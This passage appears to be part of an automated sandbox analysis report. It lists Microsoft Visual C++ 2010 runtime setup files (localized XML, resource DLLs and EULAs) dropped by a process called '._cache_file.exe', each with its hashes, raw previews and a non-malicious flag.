                                                                                            Preview:{\rtf1\ansi\ansicpg1252\deff0\deflang1033\deflangfe1033{\fonttbl{\f0\fswiss\fprq2\fcharset0 Tahoma;}{\f1\froman\fprq2\fcharset0 Times New Roman;}{\f2\froman\fprq2\fcharset2 Symbol;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2508;}\viewkind4\uc1\pard\nowidctlpar\sb120\sa120\b\f0\fs20 MICROSOFT SOFTWARE LICENSE TERMS\f1\par..\pard\brdrb\brdrs\brdrw10\brsp20 \nowidctlpar\sb120\sa120\f0 MICROSOFT VISUAL C++ 2010 RUNTIME LIBRARIES\f1\par..\pard\nowidctlpar\sb120\sa120\b0\f0 These license terms are an agreement between Microsoft Corporation (or based on where you live, one of its affiliates) and you. Please read them. They apply to the software named above, which includes the media on which you received it, if any. The terms also apply to any Microsoft\f1\par..\pard\nowidctlpar\fi-360\li360\sb120\sa120\tx360\f2\'b7\tab\f0 updates,\f1\par..\f2\'b7\tab\f0 supplements,\f1\par..\f2\'b7\tab\f0 Internet-based services, and \f1\par..\f2\'b7\tab\f0 support services\f1\par.

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\1036\LocalizedData.xml

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (619), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):41524
                                                                                            Entropy (8bit):3.5542569352968996
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:4GrYAiJoFb1Z0eQiFaD4EbJeiI5l9MwLnIBknXoFXYnZCoroUnAJJFHq20/kFR/0:4GZwoR1c5ryhnbHIJR0kbG52gjfVv
                                                                                            MD5:4CE519F7E9754EC03768EDEEDAEED926
                                                                                            SHA1:213AE458992BF2C5A255991441653C5141F41B89
                                                                                            SHA-256:BC4CA5AD609F0DD961263715E1F824524C43E73B744E55F90C703B759CAE4D31
                                                                                            SHA-512:8F2FF08A234D8E2E6BA85DE3CD1C19A0B372D9FCA4FF0FC1BBA7FE7C5A165E933E2AF5F93FC587E9230A066B70FB55D9F58256DB509CC95A3B31D349F860F510
                                                                                            Malicious:false
                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.X.6.4.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".C.e. .p.r.o.g.r.a.m.m.e. .d.'.i.n.s.t.a.l.l.a.t.i.o.n. .r.e.q.u.i.e.r.t. .u.n.e. .p.l.a.t.e.f.o.r.m.e. .x.6.4... .I.l. .n.e. .p.e.u.t. .p.a.s. ...t.r.e. .i.n.s.t.a.l.l... .s.u.r. .c.e.t.t.e. .p.l.a.t.e.f.o.r.m.e..."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.I.A.6.4.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".C.e. .p.r.o.g.r.a.m.m.e. .d.'.i.n.s.t.a.l.l.a.t.i.o.n. .r.e.q.u.i.e.r.t. .u.n.e. .p.l.a.t.e.f.o.r.m.e. .I.A.6.4... .I.l. .n.e. .p.e.u.t. .p.a.s. ...t.r.e. .i.n.s.t.a.

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\1036\SetupResources.dll

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):18776
                                                                                            Entropy (8bit):5.112489568342605
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:J7Z66AY9li3OoDDkbiWpQeWELXci2jpv8:JffiZDgycMi2jpv8
                                                                                            MD5:93F57216FE49E7E2A75844EDFCCC2E09
                                                                                            SHA1:DCCD52787F147E9581D303A444C8EE134AFC61A8
                                                                                            SHA-256:2506827219B461B7C6C862DAE29C8BFF8CB7F4A6C28D2FF60724CAC70903987D
                                                                                            SHA-512:EADFFB534C5447C24B50C7DEFA5902F9EB2DCC4CF9AF8F43FA889B3367EA25DFA6EA87FF89C59F1B7BBF7106888F05C7134718021B44337AE5B7D1F808303BB1
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........................................................P......B|....@.......................................... ...+...........2..X............................................................................................text...G...........................@..@.rsrc....0... ...,..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\1036\eula.rtf

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                            Category:dropped
                                                                                            Size (bytes):162915
                                                                                            Entropy (8bit):5.023428742885146
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:Xn6ipERiA7JzI3ilBEBr97dQnKG5zpZ27KN4:KiZ
                                                                                            MD5:BBBBB0BDA00FDA985BB39FEE5FD04FF8
                                                                                            SHA1:3053CF30FAD92F133AD3EA7EEFB8C729D323EA00
                                                                                            SHA-256:3CB591E6801E91FE58E79449F7C99B88C3BA0ACE5D922B4AA0C8F2CDD81854BD
                                                                                            SHA-512:32CC1B0F033B13D7614F8BD80DE4D3F9D4668632010BCB563E90773FB2F4971D19206C46B0C2B0E55308CA14F4DEAF5EB415DAE5F2C0C4331B5DF0AE44B2F61E
                                                                                            Malicious:false
                                                                                            Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff38\deff0\stshfdbch0\stshfloch0\stshfhich0\stshfbi0\deflang1033\deflangfe1033\themelang1033\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman{\*\falt ?l?r ???fc};}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New{\*\falt Arial};}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol{\*\falt Times};}..{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings{\*\falt Symbol};}{\f11\fbidi \fmodern\fcharset128\fprq1{\*\panose 02020609040205080304}MS Mincho{\*\falt ?l?r ??\'81\'66c};}..{\f13\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt ????????????????????????????\'a1\'a7??};}{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math{\*\falt Calisto MT};}..{\f38\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604030504040204}Tahoma{\*\falt ?? ??};}{\f39\fbidi \fswiss\f

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\1040\LocalizedData.xml

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (601), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):40320
                                                                                            Entropy (8bit):3.5296220359665447
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:4h9o3CMa9e1yzNZNs4fLCAEJ0o5H/PuRv:9aug8J1u
                                                                                            MD5:FE6B23186C2D77F7612BF7B1018A9B2A
                                                                                            SHA1:1528EC7633E998F040D2D4C37AC8A7DC87F99817
                                                                                            SHA-256:03BBE1A39C6716F07703D20ED7539D8BF13B87870C2C83DDDA5445C82953A80A
                                                                                            SHA-512:40C9C9F3607CAB24655593FC4766829516DE33F13060BE09F5EE65578824AC600CC1C07FE71CDD48BFF7F52B447FF37C0D161D755A69AC7DB7DF118DA6DB7649
                                                                                            Malicious:false
                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.X.6.4.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".I.l. .p.r.o.g.r.a.m.m.a. .d.i. .i.n.s.t.a.l.l.a.z.i.o.n.e. .r.i.c.h.i.e.d.e. .u.n.a. .p.i.a.t.t.a.f.o.r.m.a. .x.6.4... .I.m.p.o.s.s.i.b.i.l.e. .e.s.e.g.u.i.r.e. .l.'.i.n.s.t.a.l.l.a.z.i.o.n.e. .s.u. .q.u.e.s.t.a. .p.i.a.t.t.a.f.o.r.m.a..."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.I.A.6.4.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".I.l. .p.r.o.g.r.a.m.m.a. .d.i. .i.n.s.t.a.l.l.a.z.i.o.n.e. .r.i.c.h.i.e.d.e. .u.n.a. .p.i.a.t.t.a.f.o.r.m.a. .I.A.6.4... .I.m.p.o.s.s.i.b.i.l.

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\1040\SetupResources.dll

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):18264
                                                                                            Entropy (8bit):5.142702232041524
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:77n6Tg7AtONBKHno5hWXeWFLXci2jpvz2:7XAbs+ZMi2jpvz2
                                                                                            MD5:E4860FC5D4C114D5C0781714F3BF041A
                                                                                            SHA1:864CE88E8AB1DB9AFF6935F9231521B6B72D5974
                                                                                            SHA-256:6B2D479D2D2B238EC1BA9D14F9A68DC552BC05DCBCC9007C7BB8BE66DEFC643B
                                                                                            SHA-512:39B0A97C4E83D5CCA1CCCCE494831ADBC18DF1530C02E6A2C13DAE66150F66A7C987A26CECB5587EA71DD530C8BE1E46922FE8C65AE94145D90B0A057C06548D
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........,...............................................P......^.....@.......................................... ...)...........0..X............................................................................................text...G...........................@..@.rsrc....0... ...*..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\1040\eula.rtf

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                            Category:dropped
                                                                                            Size (bytes):189369
                                                                                            Entropy (8bit):4.993456059906976
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:8K91dpBgRJA8J/snalBEm0OgKXIJR10GZybh2C:8aK
                                                                                            MD5:F1602100F6C135AB5D8026E9248BAF02
                                                                                            SHA1:DEBE92E8761F5320352DCFFE844FB25A10E9EA14
                                                                                            SHA-256:284A8BBA438DA22A1B4F497B0B4ED1D9886184859527B87FF7350C83F198AB2D
                                                                                            SHA-512:2A0FBEF3114B54EDB400D913D317A5097801834BEE0FB536B0FF645DD1CA40A1451945AD563119A5BA80F26B51CDA8B23E93BE71D7C82723AFEDE3CBF1DA00C6
                                                                                            Malicious:false
                                                                                            Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch0\stshfhich0\stshfbi0\deflang1033\deflangfe1033\themelang1033\themelangfe2052\themelangcs1025{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman{\*\falt ?l?r ???fc};}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New{\*\falt Arial};}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol{\*\falt Times};}..{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings{\*\falt Symbol};}{\f11\fbidi \fmodern\fcharset128\fprq1{\*\panose 02020609040205080304}MS Mincho{\*\falt ?l?r ??\'81\'66c};}..{\f13\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt ?????????????????????????????\'a1\'ec?};}{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math{\*\falt Calisto MT};}..{\f38\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604030504040204}Tahoma{\*\falt ?? ??};}{\f39\fbidi \fsw

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\1041\LocalizedData.xml

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (440), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):34294
                                                                                            Entropy (8bit):4.383454074704535
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:4O3Oo45AyAYcou3DDn6UrMhsrHZmxqJOXhNCGYHre3iR7v:4O3OoMIYcBCOXJ6koIv
                                                                                            MD5:6F86B79DBF15E810331DF2CA77F1043A
                                                                                            SHA1:875ED8498C21F396CC96B638911C23858ECE5B88
                                                                                            SHA-256:F0F9DD1A9F164F4D2E73B4D23CC5742DA2C39549B9C4DB692283839C5313E04F
                                                                                            SHA-512:CA233A6BF55E253EBF1E8180A326667438E1124F6559054B87021095EF16FFC6B0C87361E0922087BE4CA9CABD10828BE3B6CC12C4032CB7F2A317FDBD76F818
                                                                                            Malicious:false
                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.X.6.4.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".S0n0.0.0.0.0.0.0 ..0.0.0.0.0o0 .x.6.4. ..0.0.0.0.0.0.0n0.0.0.[a.h0W0f0D0~0Y0.0S0.0o0S0n0.0.0.0.0.0.0.0.0k0o0.0.0.0.0.0.0g0M0~0[0.0.0"./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.I.A.6.4.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".S0n0.0.0.0.0.0.0 ..0.0.0.0.0o0 .I.A.6.4. ..0.0.0.0.0.0.0n0.0.0.[a.h0W0f0D0~0Y0.0S0.0o0S0n0.0.0.0.0.0.0.0.0k0o0.0.0.0.0.0.0g0M0~0[0.0.0"./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.U.n.S.u.p.p.o.r.t.e.d.O.S.).". .L.o.c.a.l.i.

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\1041\SetupResources.dll

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):15704
                                                                                            Entropy (8bit):5.929554826924656
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:Cg0rjUfwtW1+/FuZhS5CSJk/lhAW5kEW1QKPnEtObMacxc8hjeyveCXPX:5hC7mS53JkNSW5kEW1LXci2jpvJ
                                                                                            MD5:278FD7595B580A016705D00BE363612F
                                                                                            SHA1:89A299A9ABECB624C3606267371B7C07B74B3B26
                                                                                            SHA-256:B3ECD3AEA74D0D97539C4971C69F87C4B5FE478FC42A4A31F7E1593D1EBA073F
                                                                                            SHA-512:838D23D35D8D042A208E8FA88487CD1C72DA48F336157D03B9549DD55C75DA60A83F6DD2B3107EB3E5A24F3FAD70AE1629ACC563371711117C3C3E299B59D838
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!........."...............................................@............@.......................................... ..h............&..X............................................................................................text...G...........................@..@.rsrc.... ... ... ..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\1041\eula.rtf

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                            Category:dropped
                                                                                            Size (bytes):181054
                                                                                            Entropy (8bit):4.962328655200384
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:7vykJ9MRJAwJjAXetBE1rRbe+KusGWqcJ2V:fJ
                                                                                            MD5:89D66A0B94450729015D021BC8F859E9
                                                                                            SHA1:C9AD4C7DCDAFEAD282DAA1C214E7A0EAB567FFD5
                                                                                            SHA-256:6A1884515CC4378D732F681934658252A4B45D76CE7F53CF8650BE794CC8D390
                                                                                            SHA-512:336A5B1CBF2F52DF5B151A564C8452826D253F9FC565C865D7BA37B91229996D9AE59603350BD5CD99352ED63D265D8578095560CB7DE67DA7E1AA2135FBF0FB
                                                                                            Malicious:false
                                                                                            Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff38\deff0\stshfdbch13\stshfloch0\stshfhich0\stshfbi0\deflang1033\deflangfe1033\themelang1033\themelangfe2052\themelangcs1025{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman{\*\falt ?l?r ???fc};}..{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New{\*\falt Arial};}..{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol{\*\falt Times};}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings{\*\falt Symbol};}..{\f11\fbidi \fmodern\fcharset128\fprq1{\*\panose 02020609040205080304}MS Mincho{\*\falt ?l?r ??\'81\'66c};}{\f13\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt ??????????????????????????????\'a8\'ac};}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math{\*\falt Calisto MT};}{\f38\fbidi \fswiss\fcharset0\f

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\1042\LocalizedData.xml

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (439), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):32962
                                                                                            Entropy (8bit):4.366645511984528
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:4cxsW0TwUrhmUgEMDQdCAtTN/2JWCTJSIQvPaLWL2K4oH/Drv:4cxszjrxgEMDQdpFN7IJSIQvkQvLH/Pv
                                                                                            MD5:E87AD0B3BF73F3E76500F28E195F7DC0
                                                                                            SHA1:716B842F6FBF6C68DC9C4E599C8182BFBB1354DC
                                                                                            SHA-256:43B351419B73AC266C4B056A9C3A92F6DFA654328163814D17833A837577C070
                                                                                            SHA-512:D3EA8655D42A2B0938C2189CEEAB25C29939C302C2E2205E05D6059AFC2A9B2039B21C083A7C17DA1CE5EEBDC934FF327A452034E2E715E497BCD6239395774C
                                                                                            Malicious:false
                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.X.6.4.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".t. .$.X. ...\.....D. .....X.$.t. .x.6.4. ......t. .D..i..... .t. ......... .$.X.`. ... ........"./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.I.A.6.4.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".t. .$.X. ...\.....D. .....X.$.t. .I.A.6.4. ......t. .D..i..... .t. ......... .$.X.`. ... ........"./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.U.n.S.u.p.p.o.r.t.e.d.O.S.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".t. ..... ........... .M.i.c.r.o.s.o.f.

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\1042\SetupResources.dll

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):15192
                                                                                            Entropy (8bit):5.9622226182057325
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:Hpix6f+jYxzekdPKNS0N7gVCAMWpCeWRQKPnEtObMacxc8hjeyveCXmo+:3ibMj0lgRMWpCeWRLXci2jpv8o+
                                                                                            MD5:FCFD69EC15A6897A940B0435439BF5FC
                                                                                            SHA1:6DE41CABDB45294819FC003560F9A2D1E3DB9A7B
                                                                                            SHA-256:90F377815E3C81FC9AE5F5B277257B82811417CA3FFEACD73BAB530061B3BE45
                                                                                            SHA-512:4DC3580B372CEE1F4C01569BAEA8CD0A92BC613648DB22FF1855920E47387A151964B295A1126597B44BB0C596E8757B1FCF47CDA010F9BBB15A88F97F41B8BF
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!......... ...............................................@......v.....@.......................................... ...............$..X............................................................................................text...G...........................@..@.rsrc.... ... ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\1042\eula.rtf

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                            Category:dropped
                                                                                            Size (bytes):351492
                                                                                            Entropy (8bit):4.844773730829239
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:bNK7z5n/OLs3+lAB4HeqyOOZjYCrv1MT2hhO0kN9okLgd80UKdF8K8Zb4ajD/y9m:bI79kaIDUhOhQAUiK/9/MjZr
                                                                                            MD5:8203E9FC25A5720AFB8C43E8BE10C3B0
                                                                                            SHA1:FC7D9B452B6D5475FD1EF61B78E8BC6E32F08974
                                                                                            SHA-256:0EBD62213F41DFFA0BCD939BDC6ABC25096E95112C217FDF27CE661A19AD0866
                                                                                            SHA-512:F95DCB9C25436AE322C240A0D0ABD9F4904A5AF313CAC5CB8C90C1A5460DAD8E983347AD7540C672046E4210945B053B75313BB6D10B44B2A0BF0024B400E81E
                                                                                            Malicious:false
                                                                                            Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch12\stshfloch0\stshfhich0\stshfbi0\deflang1033\deflangfe1033\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman{\*\falt ?l?r ???fc};}..{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New{\*\falt Arial};}..{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol{\*\falt Times};}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings{\*\falt Symbol};}..{\f11\fbidi \fmodern\fcharset128\fprq1{\*\panose 02020609040205080304}MS Mincho{\*\falt ?l?r ??\'81\'66c};}{\f12\fbidi \froman\fcharset129\fprq2{\*\panose 02030600000101010101}Batang{\*\falt \'b9\'d9\'c5\'c1};}..{\f13\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt ??????????????????????????????\'a1\'a7};}{\f20\fbidi \froman\fcharset129\f

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\1049\LocalizedData.xml

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (634), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):40428
                                                                                            Entropy (8bit):4.233211278958208
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:4qwoGD2VLQa0inkyZfrOh+++NA3aJW5cGUT3CT+v:DVVJl
                                                                                            MD5:1290BE72ED991A3A800A6B2A124073B2
                                                                                            SHA1:DAC09F9F2CCB3B273893B653F822E3DFC556D498
                                                                                            SHA-256:6BA9A2E4A6A58F5BB792947990E51BABD9D5151A7057E1A051CB007FEA2EB41C
                                                                                            SHA-512:C0B8B4421FCB2AABE2C8C8773FD03842E3523BF2B75D6262FD8BD952ADC12C06541BDAE0219E89F9F9F8D79567A4FE4DFF99529366C4A7C5BF66C218431F3217
                                                                                            Malicious:false
                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.X.6.4.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=."...;.O. .M.B.>.9. .?.@.>.3.@.0.<.<.K. .C.A.B.0.=.>.2.:.8. .B.@.5.1.C.5.B.A.O. .?.;.0.B.D.>.@.<.0. .x.6.4... ...5. .=.5.;.L.7.O. .C.A.B.0.=.>.2.8.B.L. .=.0. .4.0.=.=.C.N. .?.;.0.B.D.>.@.<.C..."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.I.A.6.4.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=."...;.O. .M.B.>.9. .?.@.>.3.@.0.<.<.K. .C.A.B.0.=.>.2.:.8. .B.@.5.1.C.5.B.A.O. .?.;.0.B.D.>.@.<.0. .I.A.6.4... ...5. .=.5.;.L.7.O. .C.A.B.0.=.>.2.8.B.L. .=.0. .4.0.=.=.C.N. .?.;.0.B.D.>.@.<.C.

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\1049\SetupResources.dll

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
